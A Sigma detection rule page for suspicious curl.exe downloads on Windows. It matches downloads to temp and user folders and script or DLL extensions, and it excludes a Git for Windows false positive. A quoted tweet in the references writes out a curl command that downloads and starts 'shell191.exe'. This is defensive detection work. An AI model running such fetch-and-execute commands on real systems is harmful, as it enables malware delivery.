Suspicious Curl.EXE Download

 1title: Suspicious Curl.EXE Download
 2id: e218595b-bbe7-4ee5-8a96-f32a24ad3468
 3related:
 4    - id: bbeaed61-1990-4773-bf57-b81dbad7db2d # Basic curl execution
 5      type: derived
 6    - id: 9a517fca-4ba3-4629-9278-a68694697b81 # Curl download
 7      type: similar
 8status: test
 9description: Detects a suspicious curl process start on Windows and outputs the requested document to a local file
10references:
11    - https://twitter.com/max_mal_/status/1542461200797163522
12    - https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464
13    - https://github.com/pr0xylife/Qakbot/blob/4f0795d79dabee5bc9dd69f17a626b48852e7869/Qakbot_AA_23.06.2022.txt
14    - https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/
15    - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1105/T1105.md#atomic-test-18---curl-download-file
16author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
17date: 2020/07/03
18modified: 2023/02/21
19tags:
20    - attack.command_and_control
21    - attack.t1105
22logsource:
23    category: process_creation
24    product: windows
25detection:
26    selection_curl:
27        - Image|endswith: '\curl.exe'
28        - Product: 'The curl executable'
29    selection_susp_locations:
30        CommandLine|contains:
31            - '%AppData%'
32            - '%Public%'
33            - '%Temp%'
34            - '%tmp%'
35            - '\AppData\'
36            - '\Desktop\'
37            - '\Temp\'
38            - '\Users\Public\'
39            - 'C:\PerfLogs\'
40            - 'C:\ProgramData\'
41            - 'C:\Windows\Temp\'
42    selection_susp_extensions:
43        CommandLine|endswith:
44            - '.dll'
45            - '.gif'
46            - '.jpeg'
47            - '.jpg'
48            - '.png'
49            - '.temp'
50            - '.tmp'
51            - '.txt'
52            - '.vbe'
53            - '.vbs'
54    filter_optional_git_windows:
55        # Example FP
56        #   CommandLine: "C:\Program Files\Git\mingw64\bin\curl.exe" --silent --show-error --output C:/Users/test/AppData/Local/Temp/gfw-httpget-jVOEoxbS.txt --write-out %{http_code} https://gitforwindows.org/latest-tag.txt
57        ParentImage: 'C:\Program Files\Git\usr\bin\sh.exe'
58        Image: 'C:\Program Files\Git\mingw64\bin\curl.exe'
59        CommandLine|contains|all:
60            - '--silent --show-error --output '
61            - 'gfw-httpget-'
62            - 'AppData'
63    condition: selection_curl and 1 of selection_susp_* and not 1 of filter_optional_*
64falsepositives:
65    - Unknown
66level: high

References

• Something went wrong, but don’t fret — let’s give it another shot.

  
  Read More

• Reegun on Twitter

  

  “#Curl.exe is the new #rundll32.exe  -  #LOLbin Affected systems - Windows 10 build 17063 and Later curl -O http://192.168.191.1/shell191.exe & start shell191.exe More info - https://t.co/LGz8xIYiA2 https://t.co/0HrnbSvMH7 #blueteam #redteam #dfir #ThreatHunting”

  
  Read More

• Qakbot/Qakbot_AA_23.06.2022.txt at 4f0795d79dabee5bc9dd69f17a626b48852e7869 · pr0xylife/Qakbot

  

  Contribute to pr0xylife/Qakbot development by creating an account on GitHub.

  
  Read More

• SharpTongue Deploys Clever Mail-Stealing Browser Extension "SHARPEXT"

  

  Volexity tracks a variety of threat actors to provide unique insights and actionable information to its Threat Intelligence customers. One frequently encountered—that often results in forensics investigations on compromised systems—is tracked by Volexity as SharpTongue. This actor is believed to be North Korean in origin and is often publicly referred to under the name Kimsuky. The definition of which threat activity comprises Kimsuky is a matter of debate amongst threat intelligence analysts. Some publications refer to North Korean threat activity as Kimsuky that Volexity tracks under other group names and does not map back to SharpTongue. Volexity frequently observes SharpTongue targeting and victimizing individuals working for organizations in the United States, Europe and South Korea who work on topics involving North Korea, nuclear issues, weapons systems, and other matters of strategic interest to North Korea. SharpTongue's toolset is well documented in public sources; the most recent English-language post covering this toolset […]

  
  Read More

• atomic-red-team/atomics/T1105/T1105.md at 0f229c0e42bfe7ca736a14023836d65baa941ed2 · redcanaryco/atomic-red-team

  

  Small and highly portable detection tests based on MITRE's ATT&CK. - redcanaryco/atomic-red-team

  
  Read More

Related rules

• File Download Using Notepad++ GUP Utility
• PUA - Nimgrab Execution
• Suspicious Program Location with Network Connections
• AppX Package Installation Attempts Via AppInstaller.EXE
• File Download And Execution Via IEExec.EXE